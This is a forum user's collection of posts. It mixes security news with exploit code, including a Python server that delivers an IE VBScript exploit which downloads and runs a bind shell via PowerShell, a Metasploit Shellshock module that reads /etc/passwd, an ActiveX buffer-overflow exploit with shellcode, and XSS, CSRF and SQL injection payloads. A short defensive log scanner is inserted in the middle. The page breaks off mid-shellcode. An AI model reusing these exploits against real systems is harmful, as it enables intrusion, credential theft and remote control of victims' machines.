Aerosol

Everything posted by Aerosol

  1. Diaphora, a program diffing plugin for IDA (by joxeankoret) https://github.com/joxeankoret/diaphora Source
  2. The Chinese have started attacking everything they come across; two similar news stories are: GitHub hit by Massive DDoS Attack From China - Hacker News https://threatpost.com/github-hit-with-ddos-attack/111850
  3. There are a series of vulnerabilities related to credentials and authentication in two of Schneider Electric’s HMI products, and an attacker who exploits them may be able to run arbitrary code. The bugs lie in Schneider’s InduSoft Web Studio and InTouch Machine Edition products, both of which are embedded human-machine interface software packages. The applications are used for energy management operations in a number of industries, including IT, food and agriculture and energy. There are several vulnerabilities in each of the packages, and an advisory from ICS-CERT says that public exploits for some of them may be circulating. One of the vulnerabilities results from the fact that the apps use a hard-coded, cleartext password to protect sensitive information that’s stored in Project Files and Project Configuration Files. Another bug is related to the authentication method used to connect to servers from the affected apps. “When connecting to server from HMI, available user names are presented to the screen allowing for potential brute force attacks,” the advisory says. The other two vulnerabilities derive from the fact that the applications send user credentials in cleartext and the credentials also are stored in the clear. These bugs could allow an attacker easy access to a target system. Schneider Electric has released patches for the vulnerabilities in both InduSoft Web Studio and InTouch Machine Edition 2014 and encourages customers to install them as soon as possible. Source
  4. In a House Appropriations subcommittee hearing this morning on the FBI budget for the upcoming fiscal year, FBI Director James Comey was again critical of new encryption features from Apple and Google that he claims would make it impossible for law enforcement to access the contents of mobile device communications. This is not the first time the U.S. law enforcement and intelligence-gathering community has aired this complaint. Last month, NSA director Mike Rogers hit similar talking points at a New America Foundation event in D.C., calling on Congress to draft legislation providing a legal framework accessing encrypted communications. Comey claimed encryption was leading us to “a very, very dark place” in October of last year. The concerns follow announcements from Apple and Google that they deployed encryption for which not even they had the keys back in October. Today though, Congress got involved. “The new iPhone 6’s have an encryption in it that you can’t get in to and there is no backdoor key,” said Rep. Robert Aderholt (R-AL) as he reached into his pocket and pulled out his iPhone. “This is different from their predecessors. Their other phones you were able to get into. What is the FBI’s position on Google and Apple’s decision to encrypt these smart phones?” Comey replied that this reality was a huge problem for law enforcement because these new encryption implementations would make it impossible for law enforcement to execute court ordered warrants where phones were locked and communications data encrypted. “We’re drifting toward a place where a whole lot of people are going to be looking at us with tears in their eyes,” Comey argued, “and say ‘What do you mean you can’t? My daughter is missing. You have her phone. What do you mean you can’t tell me who she was texting with before she disappeared?” Comey went on to assure the attending members of Congress that he wasn’t seeking backdoors. 
He said he wants a way to access the content and communications data belonging to the subjects of criminal investigations after obtaining a warrant. Comey claims that local law enforcement officials around the country are very concerned, because, they claim, mobile communications content plays an integral role in various investigations. While Comey was unable to quantify the effect of encryption technologies on FBI investigatory work, he did claim that it has become an obstacle in a massive amount of cases, saying it would only become more of a problem moving forward. “I’ve heard tech executives say privacy should be the paramount virtue,” Comey said. “When I hear that, I close my eyes and say, ‘Try to imagine what that world looks like where pedophiles can’t be seen, kidnappers can’t be seen, drug dealers can’t be seen.'” Rep. Aderholt then asked Comey what he needs from Congress in order to address the problem. Comey acknowledged that the issue is a complex one, but ultimately that the only reasonable fix would be a legislative one and not a financial one. “If you want to do business in this country,” Comey warned, “then you’re not going to be allowed to create spaces that are beyond the reach of the law.” Rep. John Carter (R-TX) wondered how companies are able to encrypt phones in such a way that their contents cannot be accessed while also getting compromised by attacks. “Cyber is just pounding me from every direction, and every time I hear something or something pops into my head, because I don’t know anything about this stuff, [but] if they can do that to a cell phone then why can’t they do that to a computer so no one can get into it,” Carter reasoned. 
“If that’s the case, then isn’t that a solution to the invaders from around the world trying to get in here?” Somehow Carter reined in his stream of thought and brought it back to the point at hand, suggesting to his colleagues that encrypted smartphones were the perfect tool for lawlessness and in fact a violation of the Fourth Amendment, which allows for lawful search and seizure under warrant. In an attempt to make sense of the issue, the Representatives explained to one another that no safe in the world is unbreakable, so how is it legal that there could be encryption that is not accessible. They seemed to agree that the analogy was a valid one, though some would argue that a safe and a cell phone are in reality nothing alike. On that note, Rep. Michael Honda (D-CA) suggested that potential legislation seeking access to phone data may be more akin to laws governing access to the content of a suspect’s own mind than to laws dealing with physical access. He contended that some sort of force of law compelling suspects to testify or disclose the information to access their phone under threat of contempt could be another way to work around encryption. Source
  5. Until yesterday, a popular networking library for iOS and OS X used in apps such as Pinterest and Simple was susceptible to SSL man-in-the-middle (MiTM) attacks. The developer behind the framework AFNetworking on Thursday pushed a fix for the issue, a logic flaw. The flaw had lingered in the wild for more than two months but it took some repeated poking from Github users and two researchers, Simone Bovi and Mauro Gentile at the software security firm Minded Security, for the developer to finally address it. Bovi and Gentile stumbled upon the issue while doing mobile application security analysis for one of their clients in early March. After combing through the application’s source code the researchers found that the library’s SSL certification validation and its trust evaluation had been disabled, something that could have allowed any SSL traffic to be intercepted via a proxy service such as Burp Suite. “After a few minutes, we figured out that there was a logical bug while evaluating trust for SSL certificates, whose consequence was to completely disable SSL certificate validation,” Bovi wrote in a blog post yesterday, shortly before the issue was fixed. Bovi and Gentile found the issue had previously been brought up in a Github forum post in early February and that the flaw appeared to stem from a problem with version 2.5.1 of the library, introduced in late January. An additional, and more thorough post on Github 15 days ago helped the issue gain some visibility as well. “I have verified that a malicious proxy server can sniff all the contents of HTTPS communication in this case,” Github user duttski, who created a patch as a temporary workaround until the issue was fixed, warned at the time. iOS developer Mattt Thompson, who created and maintains AFNetworking, pushed Version 2.5.1 of the project live yesterday and fixed the issue by adding test and implementation of strict default validation, according to the library’s release notes. 
The library is a key part of popular social media applications like Vine and Pinterest on OS X and iOS. The framework also figures into apps and services primarily used by app and UX developers like Heroku and Parse. Source
  6. Apple, Microsoft, Facebook, Google, Yahoo! – and many, many others – have appealed to American politicians and g-men to rein in mass digital surveillance this May, and bring the intelligence community under some kind of effective oversight. "It has been nearly two years since the first news stories revealed the scope of the United States’ surveillance and bulk collection activities," the group wrote in an open letter to President Obama, congressional leaders, and the heads of the NSA and US Department of Justice. "Now is the time to take on meaningful legislative reforms to the nation’s surveillance programs that maintain national security while preserving privacy, transparency, and accountability." And, presumably, prevent future annoying headlines like this and this appearing on the web. The tech goliaths are members of the Reform Government Surveillance coalition, along with pro-privacy and civil-rights warriors. The group has been piling on the pressure over global spying, which they say hurts their business. In their latest open letter, the gang call for reform of the USA PATRIOT Act, which is up for renewal shortly. On May 31 this year, Section 215 of the act (or to give it its full and faintly ridiculous name, the Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism Act) expires. Section 215 is the part of the anti-terror law that the NSA uses to justify snooping on everyone's phone metadata. The group is pressing that the section be allowed to expire on June 1 without being reauthorized. Section 214, which covers pen registers and trap and trace devices, will also expire on that date. The group says that if they are renewed, proper oversight is needed by an independent third party. With the sections of the Patriot Act coming up for renewal, there's an increasing amount of pressure to curb the blanket spying revealed by whistleblower Edward Snowden. 
Earlier this week, a bipartisan bill was introduced into the US House of Representatives to abolish the PATRIOT Act altogether, but El Reg suspects Satan will go to work on a snowplow before it passes. Source
  7. The organizers of this year's RSA security conference have made at least one thing clear to exhibitors: no booth babes. The industry shindig has sent out a new dress code banning scantily clad models, regardless of gender, from wandering the show floor. The rules dictate that exhibitors cannot wear shorts, tank tops and halter tops, miniskirts or tops that show "excessive cleavage." Lycra body suits are also out, as are "objectionable or offensive" costumes. Anyone breaking the rules will be thrown out of the four-day conference, due to kick off on April 20 in San Francisco, California. The rules apply to men, though we doubt it will have much of an impact; male booth, er, hunks are few and far between. Flocks of buxom young ladies handing out fliers and posing for photos is an all-too depressing sight at tech conferences. The hiring of booth babes is coming under fire more and more, with critics arguing that the practice is sexist, insulting, and encourages harassment of attendees and exhibitors who are women. A number of prominent trade shows, most notably the Shanghai Auto Show, have issued similar rules banning exhibitors from dressing booth staff in revealing clothing. The RSA conference usually has relatively far fewer booth babes than most conferences due to its decidedly enterprise focus. With the new rules in place, the practice will likely be all but eliminated, forcing exhibitors to rely on the good looks and charm of their own staff or PR agency. Source
  8. The noose around the neck of the Internet's most widely used encryption scheme got a little tighter this month with the disclosure of two new attacks that can retrieve passwords, credit card numbers and other sensitive data from some transmissions protected by secure sockets layer and transport layer security protocols. Both attacks work against the RC4 stream cipher, which is estimated to encrypt about 30 percent of today's TLS traffic. Cryptographers have long known that some of the pseudo-random bytes RC4 uses to encode messages were predictable, but it wasn't until 2013 that researchers devised a practical way to exploit the shortcoming. The result was an attack that revealed small parts of the plaintext inside an HTTPS-encrypted data stream. It required attackers to view more than 17 billion (2^34) separate encryptions of the same data. That was a high bar, particularly given that the attack revealed only limited amounts of plaintext. Still, since the researchers demonstrated the attack could decrypt HTTPS-protected authentication cookies used to access user e-mail accounts, Google and other website operators immediately took notice. Now, researchers have figured out refinements that allow them to recover RC4-protected passwords with a 50-percent success rate using slightly more than 67 million (2^26) encryptions, a two-order-of-magnitude reduction over the previous attack used to recover secure cookies. The exploits—laid out in a paper published last week titled Attacks Only Get Better: Password Recovery Attacks Against RC4 in TLS—work against both Basic access authentication over HTTPS and the widely used IMAP protocol for retrieving and storing e-mail.

     Bar-mitzvah attack

     A second exploit targeting RC4 was devised by researchers from security firm Imperva and was presented Thursday at the Black Hat security conference in Singapore.
The attack uses new ways to exploit the "invariance weakness," a key pattern in RC4 keys that can leak plaintext data into the ciphertext under certain conditions. The weakness first came to light in 2001, and led to the fatal exploit against wired equivalent privacy technology used to encrypt Wi-Fi networks. Given the age of the invariance weakness, Imperva researchers are dubbing their new exploit the "bar-mitzvah attack." "The security of RC4 has been questionable for many years, in particular its initialization mechanisms," Imperva researchers wrote in a research paper that accompanied Thursday's Blackhat talk. "However, only in recent years has this understanding begun translating into a call to retire RC4. In this research, we follow [the 2013 RC4 researchers] and show that the impact of the many known vulnerabilities on systems using RC4 is clearly underestimated." The bar-mitzvah attack requires adversaries to sample about one billion RC4 encryptions to infer a credit card number, password, or authentication cookie key. The known weakness exploited involves a flaw found in one out of every 16 million (2^24) RC4 keys that leads to "structures" in the "least significant bits" of the keystream. The attack is subject to a significant limitation, however, since the leaky plaintext is contained only in the first 100 bytes of ciphertext. Despite the limitation and the challenge of sampling so many encryptions, the attack may be enough to drastically reduce the cost of doing an exhaustive attack that guesses passwords, credit card numbers or similar data. Rather than try every possible combination, the bar-mitzvah attack allows attackers to hone in on a much smaller number of candidates. The growing body of attacks that defeat SSL and TLS encryption are only one threat facing the system millions of Internet users rely on to encrypt sensitive data and authenticate servers. 
In 2011 hackers broke into Netherlands-based certificate authority DigiNotar and minted counterfeit credentials for Google and other sensitive Web properties. Earlier this week, shoddy practices at an intermediate CA known as MCS Holdings allowed its customers to obtain unauthorized certificates for several Google addresses. Poor practices on the part of Microsoft also led to the discovery of misissued certificates, on two separate occasions.

     “RC4 must die”

     The TLS protocol has two significant phases. The first "handshaking" phase uses asymmetric encryption to negotiate the symmetric encryption keys to be used by an e-mail or Web server and the connecting end user. During the later "record" phase, the parties use the agreed-upon keys to encrypt data using either the AES block cipher or RC4 stream cipher. The two attacks unveiled this month, combined with the exploit disclosed in 2013, are a strong indication the security of RC4 can't be counted on for much longer and should be phased out in favor of alternative algorithms. Retiring RC4 is proving a challenging proposition. A 2011 attack known as BEAST—short for Browser Exploit Against SSL/TLS—targets an encryption mode known as CBC, or cipher block chaining, which is present in most algorithms except for RC4. After BEAST was demonstrated to pose a credible threat to TLS-protected data in transit many security experts recommended website operators opt for RC4 to blunt the threat. That advice is no longer sound, now that RC4 is under attack, too. Imperva researchers say Web app developers should strongly consider disabling RC4 in all their TLS configurations and tech-savvy end users should disable RC4 in their browser settings. In February, the Internet Engineering Task Force submitted a request for comments prohibiting the use of the RC4 cipher. Use of RC4 has shrunk from about half of all TLS traffic in 2013 to about 30 percent today, but eliminating it altogether may take years. 
Hanging in the balance is the security and confidentiality of millions of Internet users. "RC4 was already looking nervously towards the cliff-edge," Kenny Paterson, a Royal Holloway, University of London professor who helped author last week's research, as well as the 2013 research it built on, wrote in a blog post published last week. "Our work pushes RC4 a significant step closer, leaving it teetering on the brink of oblivion for SSL/TLS. After all, attacks can only get better…" Source
  9. MIMEDefang is a flexible MIME email scanner designed to protect Windows clients from viruses. Includes the ability to do many other kinds of mail processing, such as replacing parts of messages with URLs. It can alter or delete various parts of a MIME message according to a very flexible configuration file. It can also bounce messages with unacceptable attachments. MIMEDefang works with the Sendmail 8.11 and newer "Milter" API, which makes it more flexible and efficient than procmail-based approaches. Changes: Added support for filter_wrapup callback. Various bug fixes, a typo fixed, and all perl function prototypes removed. Download Site: MIMEDefang
  10. Hi Team,
      #Affected Vendor: http://lcms.chamilo.org/
      #Date: 27/03/2015
      #Discovered by: Joel Vadodil Varghese
      #Type of vulnerability: Persistent XSS
      #Tested on: Windows 7
      #Product: LCMS Connect
      #Version: 4.1
      #Description: Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. Chamilo LCMS is a completely new software platform for e-learning and collaboration. Chamilo LCMS Connect is vulnerable to a stored XSS vulnerability. The parameter "site_name" is the vulnerable parameter which will lead to its compromise.
      #Proof of Concept (PoC):
      ------------------------
      site_name=<img src="" onerror="alert('XSS')"/>
      --
      Regards,
      Joel V
      Source
  11. Hi Team,
      #Affected Vendor: http://lcms.chamilo.org/
      #Date: 27/03/2015
      #Discovered by: Joel Vadodil Varghese
      #Type of vulnerability: XSRF
      #Tested on: Windows 7
      #Product: LCMS Connect
      #Version: 4.1
      #Description: Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. Chamilo LCMS is a completely new software platform for e-learning and collaboration. The application is vulnerable to XSRF attacks. If an attacker is able to lure a user into clicking a crafted link, or embeds such a link within web pages, he could control the user's actions.
      #Proof of Concept (PoC):
      ------------------------------------
      <form method="POST" name="form1" action="http://localhost:80/Chamilo/index.php?application=menu&go=creator&type=core\menu\ApplicationItem">
        <input type="hidden" name="parent" value="0"/>
        <input type="hidden" name="title[de]" value=""/>
        <input type="hidden" name="title[en]" value="tester"/>
        <input type="hidden" name="title[fr]" value=""/>
        <input type="hidden" name="title[nl]" value=""/>
        <input type="hidden" name="application" value="weblcms"/>
        <input type="hidden" name="submit_button" value="Create"/>
        <input type="hidden" name="_qf__item" value=""/>
        <input type="hidden" name="type" value="core\menu\ApplicationItem"/>
      </form>
      --
      Regards,
      Joel V
      Source
  12. Hi Team,
      #Affected Vendor: http://lcms.chamilo.org/
      #Date: 27/03/2015
      #Discovered by: Joel Vadodil Varghese
      #Type of vulnerability: Clickjacking
      #Tested on: Windows 7
      #Product: LCMS Connect
      #Version: 4.1
      #Description: Chamilo is an open-source (under GNU/GPL licensing) e-learning and content management system, aimed at improving access to education and knowledge globally. Chamilo LCMS is a completely new software platform for e-learning and collaboration. Framing involves placing one webpage within another webpage by use of the iframe HTML element. One familiar use of iframes is to embed maps within web pages. LCMS Connect is susceptible to a clickjacking attack.
      #Proof of Concept (PoC):
      ------------------------------------
      <iframe src="http://localhost/Chamilo/" sanboxed width=900 height=900>
        Please check me out !!!!
      </iframe>
      --
      Regards,
      Joel V
      Source
  13. #!/usr/bin/python
      import BaseHTTPServer, sys, socket
      ##
      # Acunetix OLE Automation Array Remote Code Execution
      #
      # Author: Naser Farhadi
      # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
      #
      # Date: 27 Mar 2015
      # Version: <=9.5
      # Tested on: Windows 7
      # Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record
      #              Target Login Sequence
      # Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/
      # This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And
      # Metasploit windows/shell_bind_tcp Executable Payload
      # And Finally You Can Connect To Victim Machine Using Netcat
      # Usage:
      # chmod +x acunetix.py
      # ./acunetix.py
      # Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix
      # nc 192.168.1.7 333
      # Payload Generated By This Command: msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe
      #
      # Video: https://vid.me/SRCb
      ##

      class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
          def do_GET(req):
              req.send_response(200)
              if req.path == "/acunetix.exe":
                  req.send_header('Content-type', 'application/exe')
                  req.end_headers()
                  exe = open("acunetix.exe", 'rb')
                  req.wfile.write(exe.read())
                  exe.close()
              else:
                  req.send_header('Content-type', 'text/html')
                  req.end_headers()
                  req.wfile.write("""Please scan me! 
<SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\ 'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');" shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0 end function dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 
Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script>""")

      if __name__ == '__main__':
          sclass = BaseHTTPServer.HTTPServer
          server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
          print "Http server started", socket.gethostbyname(socket.gethostname()), 80
          try:
              server.serve_forever()
          except KeyboardInterrupt:
              pass
          server.server_close()
      Source
  14. # Affected software: CMS Builder v2.07
      # Type of vulnerability: sql injection
      # URL: http://demo2.interactivetools.com/cmsbuilder2/bottom.php
      # Discovered by: Provensec
      # Website: http://www.provensec.com
      # Version: v2.07
      # Proof of concept
      http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=payload
      demo:->
      http://demo2.interactivetools.com/cmsAdmin2/admin.php?menu=services&_action=list&page=x%27%20or%201=1%20or%20%27x%27=%27y
      MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-25' at line 9
      Source
  15. # Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection
      # Date: 7 February 2015
      # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
      # Employer homepage: http://www.securegroup.it
      # Vendor homepage: http://www.qnap.com
      # Version: All Turbo NAS models except TS-100, TS-101, TS-200
      # Tested on: TS-1279U-RP
      # CVE : 2014-6271
      # Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61
      ##
      # This module requires Metasploit: http//metasploit.com/download
      # Current source: https://github.com/d3vpp/metasploit-modules
      ##

      require 'msf/core'

      class Metasploit3 < Msf::Auxiliary
        Rank = ExcellentRanking
        include Msf::Exploit::Remote::HttpClient

        def initialize(info = {})
          super(update_info(info,
            'Name'        => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection',
            'Description' => %q{
              This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system.
              Affected products: All Turbo NAS models except TS-100, TS-101, TS-200
            },
            'Author'      => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other]
            'License'     => MSF_LICENSE,
            'References'  => [
              ['CVE', '2014-6271'], # aka ShellShock
              ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61']
            ],
            'Platform'    => ['unix']
          ))

          register_options([
            OptString.new('TARGETURI', [true, 'Path to CGI script', '/cgi-bin/index.cgi']),
            OptString.new('CMD', [true, 'The command to run', '/bin/cat /etc/passwd'])
          ], self.class)
        end

        def check
          begin
            res = send_request_cgi({
              'method' => 'GET',
              'uri'    => normalize_uri(target_uri.path),
              'agent'  => "() { :;}; echo; /usr/bin/id"
            })
          rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
            vprint_error("Connection failed")
            return Exploit::CheckCode::Unknown
          end

          if !res
            return Exploit::CheckCode::Unknown
          elsif res.code == 302 and res.body.include? 'uid'
            return Exploit::CheckCode::Vulnerable
          end
          return Exploit::CheckCode::Safe
        end

        def run
          res = send_request_cgi({
            'method' => 'GET',
            'uri'    => normalize_uri(target_uri.path),
            'agent'  => "() { :;}; echo; #{datastore['CMD']}"
          })

          if res.body.empty?
            print_error("No data found.")
          elsif res.code == 302
            print_status("#{rhost}:#{rport} - bash env variable injected")
            puts " "
            print_line(res.body)
          end
        end
      end
      Source
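As an added defender-side example (not part of the original post and not code from the module above), the following Python scan runs over constructed Apache "combined"-format log lines and flags any request whose User-Agent or Referer begins with the bash function-definition prefix that the module sends (`() { :;};`). The `matches_module_success_signal` field mirrors the check the module itself uses on QNAP CGI: a 302 response to a probe is what it treats as "vulnerable".

```python
import re
from typing import Dict, List, Optional

# Bash function-definition prefix that the Shellshock (CVE-2014-6271) probe
# relies on. The module above sends it as "() { :;}; ..." in the User-Agent.
# Whitespace is optional in bash, so "(){:;}" is matched as well.
FUNC_PREFIX = re.compile(r"^\s*\(\)\s*\{")

# Apache/nginx "combined" log format:
#   ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample log lines (not captured from any real system).
SAMPLE_LOG = (
    '10.0.0.5 - - [27/Mar/2015:10:01:02 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" '
    '302 0 "-" "() { :;}; echo; /usr/bin/id"\n'
    '10.0.0.7 - - [27/Mar/2015:10:02:00 +0000] "GET /index.html HTTP/1.1" '
    '200 1234 "-" "Mozilla/5.0 (X11; Linux x86_64)"\n'
    '10.0.0.8 - - [27/Mar/2015:10:02:30 +0000] "GET /cgi-bin/index.cgi HTTP/1.1" '
    '404 0 "(){:;}; echo; /usr/bin/id" "curl/7.41.0"\n'
)


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields; None if it does not parse."""
    m = COMBINED.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def is_shellshock_probe(value: str) -> bool:
    """True if a header value starts with a bash function definition."""
    return bool(FUNC_PREFIX.match(value))


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one hit per header (User-Agent or Referer) carrying the probe prefix."""
    hits: List[Dict[str, object]] = []
    for line in text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        for header in ("agent", "referer"):
            if is_shellshock_probe(rec[header]):
                hits.append({
                    "ip": rec["ip"],
                    "request": rec["request"],
                    "header": header,
                    "payload": rec[header],
                    "status": int(rec["status"]),
                    # The module's check() treats a 302 to its probe as the
                    # "vulnerable" signal on QNAP CGI, so surface that case.
                    "matches_module_success_signal": rec["status"] == "302",
                })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Point `scan_log` at a real access log to triage probes after the fact; the parser assumes the combined format and skips lines that do not match it.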
  16. <html> <title>WebGate WinRDS WESPPlayback.WESPPlaybackCtrl.1 StopSiteAllChannel Stack Buffer Overflow Vulnerability (0Day)</title> <!-- # Exploit Title: WebGate WinRDS StopSiteAllChannel Stack Overflow SEH Overwrite (0Day) # Google Dork: [if relevant] (we will automatically add these to the GHDB) # Date: 27th March, 2015 # Exploit Author: Praveen Darshanam # Vendor Homepage: http://www.webgateinc.com/wgi/eng/ # Software Link: http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36 # Version: WinRDS 2.0.8 # Tested on: Windows XP SP3 using IE/6/7/8 # CVE : 2015-2094 targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll" prototype = "Sub StopSiteAllChannel ( ByVal SiteSerialNumber As String )" progid = "WESPPLAYBACKLib.WESPPlaybackCtrl" Vulnerable Product = WinRDS 2.0.8 Software = http://www.webgateinc.com/wgi/eng/index.php?svc_name=product&amCode=C029&asCode=C039&ec_idx1=P040&ptype=view&page=&p_idx=36 --> <object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='ssac'> </object> <script> var buff1 = ""; var nops = ""; var buff2 = ""; for (i=0;i<128; i++) { buff1 += "B"; } nseh = "\xeb\x08PD"; //pop pop ret = 1007f2a0 (0x1007f29e) 1007f2a0 var seh = "\xa0\xf2\x07\x10"; for (i=0;i<80; i++) { nops += "\x90"; } sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" + "\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" + "\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" + "\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" + "\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" + "\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" + "\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" + "\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" + "\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" + "\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" + "\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" + 
